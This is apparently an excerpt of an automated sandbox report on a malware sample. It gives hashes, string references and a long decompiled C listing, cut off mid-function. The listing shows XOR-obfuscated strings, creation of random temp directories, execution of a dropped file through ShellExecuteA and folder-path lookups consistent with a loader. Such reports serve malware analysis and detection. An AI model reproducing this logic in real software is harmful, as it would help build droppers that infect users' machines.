Part of subcall function 0082D955: RtlEnterCriticalSection.NTDLL(0043C4FC), ref: 0082D95F
Part of subcall function 0082D955: RtlLeaveCriticalSection.NTDLL(0043C4FC), ref: 0082D992

Strings

GO@., xrefs: 00824ACB
|[]], xrefs: 00824AC4
|[]]GO@., xrefs: 00824B0D

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$InfoInit_thread_footerKeyboardLayoutListLocale
String ID: GO@.$|[]]$|[]]GO@.
API String ID: 1012469502-2383573185
Opcode ID: 8aa809e5098e1252f12d3f393645a4acb5f4182aa7a743929b8650569cff3e9c
Instruction ID: b0225e8f4addcd88b812eef61f979f1bcc55774a6535176bcc721b830da81e9d
Opcode Fuzzy Hash: 8aa809e5098e1252f12d3f393645a4acb5f4182aa7a743929b8650569cff3e9c
Instruction Fuzzy Hash: 6C81D571D002A88BDB18CFACEC857ADBBB0FF15324F141229E415F7292D775A984CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00405840 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 167
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00405840() {
				intOrPtr _v8;
				char _v16;
				char _v24;
				signed int _v32;
				char _v220;
				char _v300;
				char _v564;
				char _v565;
				void* _v568;
				signed char _v572;
				void* _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				void* _v592;
				short _v596;
				signed char _v600;
				void* _v604;
				char _v620;
				signed char _v624;
				void* _v628;
				void* _v644;
				signed char _v648;
				void* _v652;
				char _v668;
				signed char _v672;
				void* _v676;
				void* _v692;
				signed char _v696;
				void* _v700;
				void* _v716;
				signed char _v720;
				void* _v724;
				void* _v740;
				signed char _v744;
				void* _v748;
				void* _v764;
				signed char _v768;
				void* _v772;
				void* _v788;
				char _v812;
				char _v836;
				void* _v840;
				char _v860;
				char _v884;
				char _v908;
				char _v932;
				void* _v1196;
				void* _v1200;
				void* _v1204;
				void* _v1208;
				void* _v1216;
				intOrPtr _v1220;
				intOrPtr _v1224;
				char* _v1248;
				intOrPtr _v1256;
				char _v1260;
				char _v1588;
				char _v1916;
				char _v2244;
				char _v2572;
				signed int _v2576;
				signed char _v2580;
				void* _v2584;
				void* _v2600;
				signed char _v2604;
				signed char _v2608;
				void* _v2612;
				void* _v2628;
				signed char _v2632;
				void* _v2636;
				void* _v2652;
				void* _v2656;
				void* _v2660;
				void* _v2676;
				signed char _v2680;
				void* _v2684;
				char _v2700;
				signed int _t566;
				signed int _t567;
				intOrPtr _t573;
				intOrPtr _t574;
				intOrPtr _t576;
				intOrPtr _t577;
				intOrPtr _t579;
				intOrPtr _t580;
				intOrPtr _t582;
				intOrPtr _t583;
				signed int _t590;
				signed char _t592;
				signed char _t593;
				signed char _t596;
				signed char _t598;
				signed int _t599;
				signed char _t602;
				intOrPtr _t603;
				signed char _t604;
				signed int _t605;
				signed char _t608;
				intOrPtr _t614;
				signed char _t617;
				signed char _t618;
				signed char _t621;
				intOrPtr _t622;
				char* _t626;
				void* _t628;
				void* _t631;
				intOrPtr _t639;
				signed char* _t642;
				signed char* _t644;
				void* _t645;
				signed int _t651;
				signed int _t652;
				void* _t658;
				void* _t659;
				signed int _t661;
				void* _t667;
				signed int _t676;
				void* _t678;
				void* _t679;
				signed int _t684;
				void* _t689;
				void* _t694;
				void* _t695;
				signed int _t697;
				void* _t703;
				void* _t708;
				void* _t709;
				signed int _t711;
				signed int _t718;
				signed char _t719;
				void* _t729;
				char* _t734;
				signed int _t738;
				void* _t742;
				void* _t746;
				void* _t747;
				void* _t748;
				void* _t752;
				void* _t757;
				void* _t758;
				signed int _t760;
				void* _t765;
				signed int _t768;
				intOrPtr* _t773;
				signed int _t774;
				signed int _t775;
				intOrPtr _t777;
				void* _t780;
				void* _t784;
				void* _t788;
				intOrPtr _t792;
				void* _t796;
				intOrPtr _t800;
				intOrPtr _t804;
				void* _t818;
				signed char _t826;
				signed int _t827;
				signed char _t830;
				signed int _t831;
				signed char _t833;
				void* _t839;
				signed char _t843;
				void* _t848;
				signed char _t852;
				signed char _t858;
				signed int _t859;
				signed char _t862;
				signed int _t863;
				signed char _t864;
				void* _t870;
				signed char _t874;
				void* _t879;
				signed char _t883;
				void* _t889;
				signed char _t891;
				signed int _t892;
				signed char _t895;
				signed int _t896;
				void* _t898;
				signed char _t902;
				signed char _t907;
				void* _t914;
				void* _t915;
				signed char _t917;
				signed char _t918;
				signed char _t921;
				signed char _t922;
				void* _t924;
				void* _t940;
				void* _t949;
				void* _t953;
				char _t957;
				void* _t962;
				void* _t969;
				signed int _t978;
				signed int _t979;
				signed int _t983;
				signed int _t984;
				void* _t985;
				void* _t986;
				intOrPtr* _t990;
				intOrPtr* _t993;
				intOrPtr* _t996;
				intOrPtr* _t999;
				signed char* _t1006;
				void** _t1008;
				signed char* _t1010;
				void** _t1012;
				signed char* _t1014;
				void** _t1016;
				intOrPtr* _t1018;
				signed char* _t1021;
				intOrPtr* _t1024;
				intOrPtr* _t1036;
				signed char _t1087;
				void* _t1136;
				void* _t1137;
				void* _t1138;
				intOrPtr _t1139;
				void* _t1140;
				intOrPtr _t1141;
				intOrPtr _t1142;
				signed char* _t1143;
				signed char* _t1146;
				signed int _t1147;
				signed char* _t1148;
				signed char* _t1151;
				signed char* _t1155;
				signed char* _t1158;
				signed char* _t1162;
				signed char* _t1165;
				void* _t1167;
				void* _t1169;
				char* _t1170;
				void* _t1171;
				void* _t1172;
				void* _t1173;
				void* _t1174;
				signed char _t1176;
				signed char _t1178;
				signed char _t1180;
				signed char _t1182;
				signed char _t1184;
				signed char _t1191;
				signed char _t1192;
				signed char _t1193;
				signed char _t1194;
				void* _t1195;
				signed char _t1196;
				signed char _t1197;
				signed char _t1198;
				void* _t1202;
				signed int _t1210;
				void* _t1222;
				void* _t1223;
				void* _t1224;
				void* _t1225;
				void* _t1226;
				void* _t1227;
				void* _t1228;
				signed char _t1230;
				void* _t1232;
				void* _t1233;
				signed char _t1235;
				void* _t1237;
				void* _t1238;
				signed char _t1242;
				void* _t1243;
				signed char _t1248;
				void* _t1249;
				void* _t1250;
				void* _t1251;
				void* _t1252;
				intOrPtr* _t1254;
				intOrPtr _t1257;
				intOrPtr _t1258;
				void* _t1260;
				void* _t1261;
				signed char _t1263;
				void* _t1268;
				signed int _t1272;
				void* _t1277;
				signed int _t1280;
				void* _t1283;
				void* _t1286;
				void* _t1289;
				void* _t1290;
				void* _t1291;
				void* _t1292;
				void* _t1295;
				void* _t1301;

				_t985 = _t1277;
				_t1280 = (_t1277 - 0x00000008 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t985 + 4));
				_push(0xffffffff);
				_push(0x42b0af);
				_push( *[fs:0x0]);
				_push(_t985);
				_t566 =  *0x43b054; // 0x41d6575c
				_t567 = _t566 ^ _t1280;
				_v32 = _t567;
				_push(_t567);
				 *[fs:0x0] =  &_v24;
				_v16 = 1;
				E004165E7(_t986, E00417043(_t986, _t1169, 0));
				_t1170 =  *(_t985 + 0x20);
				_t1257 =  *((intOrPtr*)(_t985 + 0x30));
				_t1283 = _t1280 - 0xa70 + 8;
				_v565 =  *((intOrPtr*)(_t985 + 0x34)) - 0x10 >= 0;
				_t988 =  >=  ? _t1170 : _t985 + 0x20;
				if(_t1257 != 3) {
					L7:
					_t988 =  !=  ? _t1170 : _t985 + 0x20;
					if(_t1257 != 4) {
						L18:
						CreateThread(0, 0, E00404FB0, 0, 0, 0);
						_t1254 = Sleep;
						Sleep(0xbb8);
						_t1258 =  *((intOrPtr*)( *[fs:0x2c]));
						_t573 =  *0x43ce20; // 0x0
						if(_t573 >  *((intOrPtr*)(_t1258 + 4))) {
							E0040D738(_t573, 0x43ce20);
							_t1283 = _t1283 + 4;
							_t1332 =  *0x43ce20 - 0xffffffff;
							if( *0x43ce20 == 0xffffffff) {
								asm("movaps xmm0, [0x437d40]");
								asm("movups [0x43cedc], xmm0");
								E0040DA4A(_t988, _t1332, 0x42b860);
								E0040D6EE(0x43ce20);
								_t1283 = _t1283 + 8;
							}
						}
						if( *0x43ceeb != 0) {
							asm("movups xmm0, [0x43cedc]");
							asm("movaps xmm1, [0x437d50]");
							asm("pxor xmm1, xmm0");
							asm("movups [0x43cedc], xmm1");
						}
						_t990 = 0x43cedc;
						_v716 = 0;
						_v700 = 0;
						_v696 = 0xf;
						_v716 = 0;
						_t28 = _t990 + 1; // 0x43cedd
						_t1171 = _t28;
						goto L24;
						L28:
						if( *0x43cdf9 == 0) {
							L31:
							_t993 = 0x43cdec;
							_v740 = 0;
							_v724 = 0;
							_v720 = 0xf;
							_v740 = 0;
							_t44 = _t993 + 1; // 0x43cded
							_t1172 = _t44;
							goto L32;
							L36:
							if( *0x43cfaa == 0) {
								L39:
								_t996 = 0x43cf9c;
								_v764 = 0;
								_v748 = 0;
								_v744 = 0xf;
								_v764 = 0;
								_t62 = _t996 + 1; // 0x43cf9d
								_t1173 = _t62;
								asm("o16 nop [eax+eax]");
								goto L40;
								L44:
								if( *0x43ce15 == 0) {
									L47:
									_t999 = 0x43cdfc;
									_v788 = 0;
									_v772 = 0;
									_v768 = 0xf;
									_v788 = 0;
									_t76 = _t999 + 1; // 0x43cdfd
									_t1174 = _t76;
									asm("o16 nop [eax+eax]");
									do {
										_t583 =  *_t999;
										_t999 = _t999 + 1;
									} while (_t583 != 0);
									_push(_t999 - _t1174);
									E00402030( &_v788, 0x43cdfc);
									_v16 = 5;
									_push(4);
									_v2652 = 0;
									_v2636 = 0;
									_v2632 = 0xf;
									_v2652 = 0;
									E00402030( &_v2652, "SUB=");
									_v16 = 6;
									L004057C0(_t985 + 0x20,  &_v2652);
									_v16 = 5;
									_t1176 = _v2632;
									if(_t1176 < 0x10) {
										L53:
										_push(1);
										_v2652 = 0;
										_v2636 = 0;
										_v2632 = 0xf;
										_v2652 = 0;
										E00402030( &_v2652, "/");
										_v16 = 7;
										_t1005 = _t985 + 8;
										L004057C0(_t985 + 8,  &_v2652);
										_v16 = 5;
										_t1178 = _v2632;
										if(_t1178 < 0x10) {
											L57:
											_v2604 = E00404120(_t985, _t1005);
											_t590 = E00404800(_t985, _t1356);
											_v644 = 0;
											_v2576 = _t590;
											_v628 = 0;
											_v624 = 0xf;
											_v644 = 0;
											_v692 = 0;
											_v676 = 0;
											_v672 = 0xf;
											_v692 = 0;
											_v16 = 9;
											_t591 =  *0x43cf98;
											_v572 = 0x2e564743;
											if( *0x43cf98 >  *((intOrPtr*)(_t1258 + 4))) {
												E0040D738(_t591, 0x43cf98);
												_t1283 = _t1283 + 4;
												_t1358 =  *0x43cf98 - 0xffffffff;
												if( *0x43cf98 == 0xffffffff) {
													 *0x43cdb0 = _v572;
													E0040DA4A(_t1005, _t1358, 0x42b7e0);
													E0040D6EE(0x43cf98);
													_t1283 = _t1283 + 8;
												}
											}
											_t592 =  *0x43cdb3;
											if(_t592 != 0) {
												 *0x43cdb0 =  *0x43cdb0 ^ 0x0000002e;
												 *0x43cdb1 =  *0x43cdb1 ^ 0x0000002e;
												 *0x43cdb2 =  *0x43cdb2 ^ 0x0000002e;
												 *0x43cdb3 = _t592 ^ 0x0000002e;
											}
											_t1006 = 0x43cdb0;
											_v2628 = 0;
											_v2612 = 0;
											_v2608 = 0xf;
											do {
												_t593 =  *_t1006;
												_t1006 =  &(_t1006[1]);
											} while (_t593 != 0);
											_push(_t1006 - 0x43cdb1);
											_t1008 =  &_v2628;
											E00402030(_t1008, 0x43cdb0);
											_push(_t1008);
											_push( &_v2628);
											_t1009 = _t985 + 8;
											_t596 = E0040A200(_t985 + 8);
											_t1180 = _v2608;
											_v572 = _t596;
											if(_t1180 < 0x10) {
												L68:
												if(_t596 != 0) {
													_t597 =  *0x43cd88;
													_v572 = 0x5b4b;
													_v565 = 0x2e;
													__eflags =  *0x43cd88 -  *((intOrPtr*)(_t1258 + 4));
													if( *0x43cd88 >  *((intOrPtr*)(_t1258 + 4))) {
														E0040D738(_t597, 0x43cd88);
														_t1283 = _t1283 + 4;
														__eflags =  *0x43cd88 - 0xffffffff;
														if(__eflags == 0) {
															 *0x43cf64 = _v572;
															 *0x43cf66 = _v565;
															E0040DA4A(_t1009, __eflags, E0042B770);
															E0040D6EE(0x43cd88);
															_t1283 = _t1283 + 8;
														}
													}
													_t598 =  *0x43cf66;
													__eflags = _t598;
													if(_t598 != 0) {
														 *0x43cf64 =  *0x43cf64 ^ 0x0000002e;
														 *0x43cf65 =  *0x43cf65 ^ 0x0000002e;
														_t883 = _t598 ^ 0x0000002e;
														__eflags = _t883;
														 *0x43cf66 = _t883;
													}
													_t1010 = 0x43cf64;
													_v2628 = 0;
													_v2612 = 0;
													_v2608 = 0xf;
													do {
														_t599 =  *_t1010;
														_t1010 =  &(_t1010[1]);
														__eflags = _t599;
													} while (_t599 != 0);
													_push(_t1010 - 0x43cf65);
													_t1012 =  &_v2628;
													E00402030(_t1012, 0x43cf64);
													_push(_t1012);
													_push( &_v2628);
													_t1013 = _t985 + 8;
													_t602 = E0040A200(_t985 + 8);
													_t1182 = _v2608;
													_v572 = _t602;
													__eflags = _t1182 - 0x10;
													if(_t1182 < 0x10) {
														L120:
														__eflags = _v572;
														_t603 =  *((intOrPtr*)(_t1258 + 4));
														if(_v572 != 0) {
															_v572 = 0x5d5b;
															_v565 = 0x2e;
															__eflags =  *0x43ceec - _t603;
															if( *0x43ceec > _t603) {
																E0040D738(_t603, 0x43ceec);
																_t1283 = _t1283 + 4;
																__eflags =  *0x43ceec - 0xffffffff;
																if(__eflags == 0) {
																	 *0x43cf1c = _v572;
																	 *0x43cf1e = _v565;
																	E0040DA4A(_t1013, __eflags, E0042B740);
																	E0040D6EE(0x43ceec);
																	_t1283 = _t1283 + 8;
																}
															}
															_t604 =  *0x43cf1e;
															__eflags = _t604;
															if(_t604 != 0) {
																 *0x43cf1c =  *0x43cf1c ^ 0x0000002e;
																 *0x43cf1d =  *0x43cf1d ^ 0x0000002e;
																_t852 = _t604 ^ 0x0000002e;
																__eflags = _t852;
																 *0x43cf1e = _t852;
															}
															_t1014 = 0x43cf1c;
															_v2628 = 0;
															_v2612 = 0;
															_v2608 = 0xf;
															do {
																_t605 =  *_t1014;
																_t1014 =  &(_t1014[1]);
																__eflags = _t605;
															} while (_t605 != 0);
															_push(_t1014 - 0x43cf1d);
															_t1016 =  &_v2628;
															E00402030(_t1016, 0x43cf1c);
															_push(_t1016);
															_push( &_v2628);
															_t1017 = _t985 + 8;
															_t608 = E0040A200(_t985 + 8);
															_t1184 = _v2608;
															_v572 = _t608;
															__eflags = _t1184 - 0x10;
															if(_t1184 < 0x10) {
																L151:
																__eflags = _t608;
																if(_t608 != 0) {
																	L172:
																	if(_v2604 != 0) {
																		_push(1);
																		_t1017 =  &_v692;
																		E00402030( &_v692, "n");
																	}
																	_t1386 = _v2576;
																	if(_v2576 != 0) {
																		_push(1);
																		_t1017 =  &_v692;
																		E00402030( &_v692, "r");
																	}
																	E0040F2F0(_t1254,  &_v1260, 0, 0x148);
																	_v1248 = "1";
																	_v1256 = 0x7a120;
																	_v1260 = E0040D5FD(_t1254, _t1258, _t1386, 0x7a120);
																	E0040F2F0(_t1254, _t611, 0, _v1256);
																	_t1286 = _t1283 + 0x1c;
																	_v1224 = 0xfde9;
																	_v1204 = 0;
																	_v1200 = 0;
																	_v1196 = 0;
																	_v16 = 0xa;
																	_t613 =  *0x43cd38;
																	_v580 = 0x4c5b5d08;
																	_v576 = 0x4b5c5a5d;
																	_v572 = 0x2e13434f;
																	if( *0x43cd38 >  *((intOrPtr*)(_t1258 + 4))) {
																		E0040D738(_t613, 0x43cd38);
																		_t1286 = _t1286 + 4;
																		_t1388 =  *0x43cd38 - 0xffffffff;
																		if( *0x43cd38 == 0xffffffff) {
																			asm("movq xmm0, [ebp-0x238]");
																			asm("movq [0x43cf6c], xmm0");
																			 *0x43cf74 = _v572;
																			E0040DA4A(_t1017, _t1388, 0x42b6c0);
																			E0040D6EE(0x43cd38);
																			_t1286 = _t1286 + 8;
																		}
																	}
																	if( *0x43cf77 == 0) {
																		L182:
																		_t1018 = 0x43cf6c;
																		_v2628 = 0;
																		_v2612 = 0;
																		_v2608 = 0xf;
																		_v2628 = 0;
																		asm("o16 nop [eax+eax]");
																		do {
																			_t614 =  *_t1018;
																			_t1018 = _t1018 + 1;
																		} while (_t614 != 0);
																		_push(_t1018 - 0x43cf6d);
																		E00402030( &_v2628, 0x43cf6c);
																		_v16 = 0xb;
																		_t616 =  *0x43ce8c;
																		_v580 = 0x5c5a5d08;
																		_v576 = 0x13434f4b;
																		_v565 = 0x2e;
																		if( *0x43ce8c >  *((intOrPtr*)(_t1258 + 4))) {
																			E0040D738(_t616, 0x43ce8c);
																			_t1286 = _t1286 + 4;
																			_t1394 =  *0x43ce8c - 0xffffffff;
																			if( *0x43ce8c == 0xffffffff) {
																				asm("movq xmm0, [ebp-0x238]");
																				asm("movq [0x43cd3c], xmm0");
																				 *0x43cd44 = _v565;
																				E0040DA4A( &_v2628, _t1394, 0x42b6e0);
																				E0040D6EE(0x43ce8c);
																				_t1286 = _t1286 + 8;
																			}
																		}
																		_t617 =  *0x43cd44;
																		if(_t617 != 0) {
																			 *0x43cd3c =  *0x43cd3c ^ 0x0000002e;
																			 *0x43cd3d =  *0x43cd3d ^ 0x0000002e;
																			 *0x43cd3e =  *0x43cd3e ^ 0x0000002e;
																			 *0x43cd3f =  *0x43cd3f ^ 0x0000002e;
																			 *0x43cd40 =  *0x43cd40 ^ 0x0000002e;
																			 *0x43cd41 =  *0x43cd41 ^ 0x0000002e;
																			 *0x43cd42 =  *0x43cd42 ^ 0x0000002e;
																			 *0x43cd43 =  *0x43cd43 ^ 0x0000002e;
																			 *0x43cd44 = _t617 ^ 0x0000002e;
																		}
																		_t1021 = 0x43cd3c;
																		_v592 = 0;
																		_v576 = 0;
																		_v572 = 0xf;
																		_v592 = 0;
																		do {
																			_t618 =  *_t1021;
																			_t1021 =  &(_t1021[1]);
																		} while (_t618 != 0);
																		_push(_t1021 - 0x43cd3d);
																		E00402030( &_v592, 0x43cd3c);
																		_v16 = 0xc;
																		_t620 =  *0x43ce68;
																		_v565 = 0x2e;
																		if( *0x43ce68 >  *((intOrPtr*)(_t1258 + 4))) {
																			E0040D738(_t620, 0x43ce68);
																			_t1286 = _t1286 + 4;
																			_t1399 =  *0x43ce68 - 0xffffffff;
																			if( *0x43ce68 == 0xffffffff) {
																				asm("movaps xmm0, [0x437d30]");
																				asm("movups [0x43cd60], xmm0");
																				 *0x43cd70 = _v565;
																				E0040DA4A( &_v592, _t1399, 0x42b700);
																				E0040D6EE(0x43ce68);
																				_t1286 = _t1286 + 8;
																			}
																		}
																		_t621 =  *0x43cd70;
																		if(_t621 != 0) {
																			asm("movups xmm0, [0x43cd60]");
																			asm("movaps xmm1, [0x437d50]");
																			asm("pxor xmm1, xmm0");
																			 *0x43cd70 = _t621 ^ 0x0000002e;
																			asm("movups [0x43cd60], xmm1");
																		}
																		_t1024 = 0x43cd60;
																		_v2652 = 0;
																		_v2636 = 0;
																		_v2632 = 0xf;
																		_v2652 = 0;
																		do {
																			_t622 =  *_t1024;
																			_t1024 = _t1024 + 1;
																		} while (_t622 != 0);
																		_push(_t1024 - 0x43cd61);
																		E00402030( &_v2652, 0x43cd60);
																		_v16 = 0xd;
																		_t625 =  >=  ? _v716 :  &_v716;
																		_t626 = E0040BE50( &_v2652,  &_v2652,  >=  ? _v716 :  &_v716, _v700);
																		_v2676 = 0;
																		_v2660 = 0;
																		_v2656 = 0;
																		asm("movups xmm0, [eax]");
																		asm("movups [ebp-0xa68], xmm0");
																		asm("movq xmm0, [eax+0x10]");
																		asm("movq [ebp-0xa58], xmm0");
																		 *(_t626 + 0x10) = 0;
																		 *(_t626 + 0x14) = 0xf;
																		 *_t626 = 0;
																		_v16 = 0xe;
																		_t628 = E0040B190( &_v620,  &_v2676, _t985 + 0x20);
																		_v16 = 0xf;
																		_push( &_v592);
																		E0040BC70( &_v2600, _t1258, _v2576, _t628);
																		_v16 = 0x10;
																		_t631 = E0040B190( &_v668,  &_v2600,  &_v692);
																		_v16 = 0x11;
																		_push( &_v2628);
																		E0040BC70( &_v2700, _t1258, _v2576, _t631);
																		_v16 = 0x12;
																		E0040B190( &_v860,  &_v2700, _t985 + 8);
																		_t1289 = _t1286 + 0xc;
																		_v16 = 0x14;
																		_t1191 = _v2680;
																		if(_t1191 < 0x10) {
																			L202:
																			_v2684 = 0;
																			_v2680 = 0xf;
																			_v2700 = 0;
																			_v16 = 0x15;
																			_t1192 = _v648;
																			if(_t1192 < 0x10) {
																				L206:
																				_v652 = 0;
																				_v648 = 0xf;
																				_v668 = 0;
																				_v16 = 0x16;
																				_t1193 = _v2580;
																				if(_t1193 < 0x10) {
																					L210:
																					_v2584 = 0;
																					_v2580 = 0xf;
																					_v2600 = 0;
																					_v16 = 0x17;
																					_t1194 = _v600;
																					if(_t1194 < 0x10) {
																						L214:
																						_v604 = 0;
																						_v600 = 0xf;
																						_v620 = 0;
																						_v16 = 0x18;
																						_t1195 = _v2656;
																						if(_t1195 < 0x10) {
																							L218:
																							_v2660 = 0;
																							_v2656 = 0xf;
																							_v2676 = 0;
																							_v16 = 0x19;
																							_t1196 = _v2632;
																							if(_t1196 < 0x10) {
																								L222:
																								_v2636 = 0;
																								_v2632 = 0xf;
																								_v2652 = 0;
																								_v16 = 0x1a;
																								_t1197 = _v572;
																								if(_t1197 < 0x10) {
																									L226:
																									_v16 = 0x1b;
																									_t1198 = _v2608;
																									if(_t1198 < 0x10) {
																										while(1) {
																											_t635 = _v1216;
																											_t1260 =  >=  ? _v860 :  &_v860;
																											_v1208 = 0;
																											if(_v1216 != 0) {
																												L0040D3BD(_t635);
																												_t1289 = _t1289 + 4;
																												_v1216 = 0;
																											}
																											if(L00401900(_t985,  &_v1260, _t1254, _t1260) == 0) {
																												goto L250;
																											}
																											_v592 = 0;
																											_t1200 =  ==  ? 0 : _v1220;
																											_v576 = 0;
																											_t1036 =  ==  ? 0 : _v1220;
																											_v572 = 0xf;
																											_v592 = 0;
																											_t1261 = _t1036 + 1;
																											do {
																												_t639 =  *_t1036;
																												_t1036 = _t1036 + 1;
																											} while (_t639 != 0);
																											_push(_t1036 - _t1261);
																											E00402030( &_v592, _t1200);
																											_v16 = 0x1c;
																											_t1201 = _v572;
																											_t1039 = _v592;
																											_t1262 = _v576;
																											_v565 = _t1201 - 0x10 >= 0;
																											_t642 =  >=  ? _t1039 :  &_v592;
																											if(_t1262 != 1) {
																												L241:
																												_t644 =  !=  ? _t1039 :  &_v592;
																												if(_t1262 != 1) {
																													L246:
																													_v16 = 0x1b;
																													if(_t1201 < 0x10) {
																														goto L250;
																													}
																													_t1202 = _t1201 + 1;
																													_t645 = _t1039;
																													if(_t1202 < 0x1000) {
																														L249:
																														_push(_t1202);
																														E0040D5EF(_t1039);
																														_t1289 = _t1289 + 8;
																														goto L250;
																													}
																													_t1039 =  *((intOrPtr*)(_t1039 - 4));
																													_t1202 = _t1202 + 0x23;
																													if(_t645 - _t1039 + 0xfffffffc > 0x1f) {
																														L229:
																														E00411D17(_t985, _t1039, _t1202, _t1426);
																														L230:
																														_push(_t1202);
																														E0040D5EF(_t1039);
																														_t1289 = _t1289 + 8;
																														continue;
																													}
																													goto L249;
																												}
																												_t651 =  *_t644 & 0x000000ff;
																												if(_t651 != 0x31) {
																													asm("sbb eax, eax");
																													_t652 = _t651 | 0x00000001;
																													__eflags = _t652;
																												} else {
																													_t652 = 0;
																												}
																												if(_t652 == 0) {
																													E00401DC0(_t985,  &_v592);
																													E0040A470( &_v884);
																													_t1290 = _t1289 - 0x10;
																													_v16 = 0x1d;
																													E00401250( &_v2572, "0");
																													_v16 = 0x1e;
																													while(1) {
																														_t658 = E00401E90( &_v668, E0040A110(E004079E0(_t985, _t1201, _t1254, _t1262)));
																														_t1201 =  &_v740;
																														_v16 = 0x21;
																														_t659 = E0040B130( &_v620,  &_v740, _t658);
																														_t1290 = _t1290 + 4;
																														_v16 = 0x22;
																														_t661 = E00401BF0(_t985,  &_v2572, _t1254, E00401D80(_t659));
																														_t1262 = _t661;
																														E00401DC0(_t985,  &_v620);
																														_v16 = 0x1e;
																														E00401DC0(_t985,  &_v668);
																														__eflags = _t661;
																														if(_t661 == 0) {
																															goto L255;
																														}
																														E00401D90( &_v884, E00401C60( &_v2572));
																														_t667 = E00401D70( &_v884);
																														__eflags = _t667 - 0xa;
																														if(_t667 <= 0xa) {
																															goto L255;
																														}
																														__eflags = _t667 - 0x64;
																														if(_t667 < 0x64) {
																															_t1291 = _t1290 - 0x10;
																															_t1263 = 0;
																															E00401250( &_v1588, "1");
																															_v16 = 0x23;
																															__eflags = _v2604;
																															if(_v2604 != 0) {
																																L265:
																																E0040F2F0(_t1254,  &_v564, 0, 0x104);
																																_t1292 = _t1291 + 0xc;
																																GetTempPathA(0x104,  &_v564);
																																E00401E90( &_v908,  &_v564);
																																_t1055 =  &_v812;
																																E0040A470( &_v812);
																																_v16 = 0x29;
																																_t1264 = 0x16;
																																asm("o16 nop [eax+eax]");
																																do {
																																	_t676 = E004165C6(_t1055, __eflags);
																																	asm("cdq");
																																	_t678 = E00404DD0( &_v668, _t676 % _t1264 + 8);
																																	_v16 = 0x2a;
																																	_t679 = E0040B130( &_v620,  &_v908, _t678);
																																	_t1292 = _t1292 + 4;
																																	E00401E10(_t985,  &_v812, _t679);
																																	E00401DC0(_t985,  &_v620);
																																	_v16 = 0x29;
																																	E00401DC0(_t985,  &_v668);
																																	_t1055 =  &_v812;
																																	_t684 = CreateDirectoryA(E00401D80( &_v812), 0);
																																	 *_t1254(0x3e8);
																																	__eflags = _t684;
																																	_t1264 = 0x16;
																																} while (__eflags == 0);
																																E00401250( &_v1916, "D");
																																_v16 = 0x2b;
																																_t689 = E00401E90( &_v620, E00408E30(E00407B10(_t985,  &_v908, _t1254, 0x16)));
																																_v16 = 0x2c;
																																E0040B130( &_v932,  &_v812, _t689);
																																_v16 = 0x2e;
																																E00401DC0(_t985,  &_v620);
																																_t694 = E00401E90( &_v2600, E00408E90(E00407BB0(_t985,  &_v812, _t1254, 0x16)));
																																_t1207 =  &_v764;
																																_v16 = 0x31;
																																_t695 = E0040B130( &_v668,  &_v764, _t694);
																																_t1295 = _t1292 - 0x10 + 8;
																																_v16 = 0x32;
																																_t697 = E00401BF0(_t985,  &_v1916, _t1254, E00401D80(_t695));
																																_t1266 = _t697;
																																E00401DC0(_t985,  &_v668);
																																_v16 = 0x2e;
																																E00401DC0(_t985,  &_v2600);
																																__eflags = _t697;
																																if(_t697 != 0) {
																																	_t752 = E00401D00( &_v1916);
																																	__eflags = _t752 - 0x14;
																																	if(_t752 > 0x14) {
																																		E00401C70( &_v1916, E00401D80( &_v932));
																																	}
																																}
																																E00401250( &_v2244, "E");
																																_v16 = 0x33;
																																_t703 = E00401E90( &_v2600, E00408E10(E00407C50(_t1207, _t1254, _t1266)));
																																_v16 = 0x34;
																																E0040B130( &_v836,  &_v812, _t703);
																																_v16 = 0x36;
																																E00401DC0(_t985,  &_v2600);
																																_t708 = E00401E90( &_v668, E00408E90(E00407CF0(_t985,  &_v812, _t1254, _t1266)));
																																_v16 = 0x39;
																																_t709 = E0040B130( &_v620,  &_v764, _t708);
																																_t1289 = _t1295 - 0x10 + 8;
																																_v16 = 0x3a;
																																_t711 = E00401BF0(_t985,  &_v2244, _t1254, E00401D80(_t709));
																																_t1267 = _t711;
																																E00401DC0(_t985,  &_v620);
																																_v16 = 0x36;
																																E00401DC0(_t985,  &_v668);
																																__eflags = _t711;
																																if(__eflags != 0) {
																																	__eflags = E00401D00( &_v2244) - 0x14;
																																	if(__eflags > 0) {
																																		E00401C70( &_v2244, E00401D80( &_v836));
																																		_t729 = E00401E90( &_v2628, E0040A140(E00407D90()));
																																		_v16 = 0x3b;
																																		_t1212 = E0040B190( &_v2700, _t729,  &_v836);
																																		_v16 = 0x3c;
																																		E0040B080( &_v668, _t730, "\"");
																																		_t1289 = _t1289 + 8;
																																		E00401DC0(_t985,  &_v2700);
																																		_v16 = 0x3f;
																																		E00401DC0(_t985,  &_v2628);
																																		_t734 = E00401D80( &_v668);
																																		ShellExecuteA(0, 0, E00408DE0(E00407DF0(_t985, _t730, _t1254, _t1267)), _t734, 0, 0);
																																		_t738 =  &_v300;
																																		__imp__SHGetFolderPathA(0, 0, 0, 0, _t738);
																																		__eflags = _t738;
																																		if(_t738 >= 0) {
																																			_t742 = E00401E90( &_v2652, E00408E10(E00407E90(_t1212, _t1254, _t1267)));
																																			_v16 = 0x40;
																																			E0040B010( &_v620,  &_v300, _t742);
																																			_v16 = 0x42;
																																			E00401DC0(_t985,  &_v2652);
																																			_t746 = E0040A140(E00407F30());
																																			_t747 = E00401D80( &_v620);
																																			_t748 = E00401D80( &_v836);
																																			E00404EB0(E00401D80( &_v836), _t748, _t747, _t746);
																																			_t1289 = _t1289 + 0xc;
																																			E00401DC0(_t985,  &_v620);
																																		}
																																		_v16 = 0x36;
																																		E00401DC0(_t985,  &_v668);
																																	}
																																}
																																L275:
																																E00404CD0(_t985, __eflags);
																																L276:
																																_t1268 = 0;
																																_v2604 = 0;
																																__eflags = 0;
																																_v2576 = 1;
																																_v572 = 0;
																																do {
																																	_t718 =  *_t1254(E00401D80( &_v788), E00401D80( &_v644));
																																	_t1087 = _v2604;
																																	_t1289 = _t1289 + 8;
																																	_t1210 = _t718;
																																	_t719 = _v572;
																																	__eflags = _t1087;
																																	if(_t1087 != 0) {
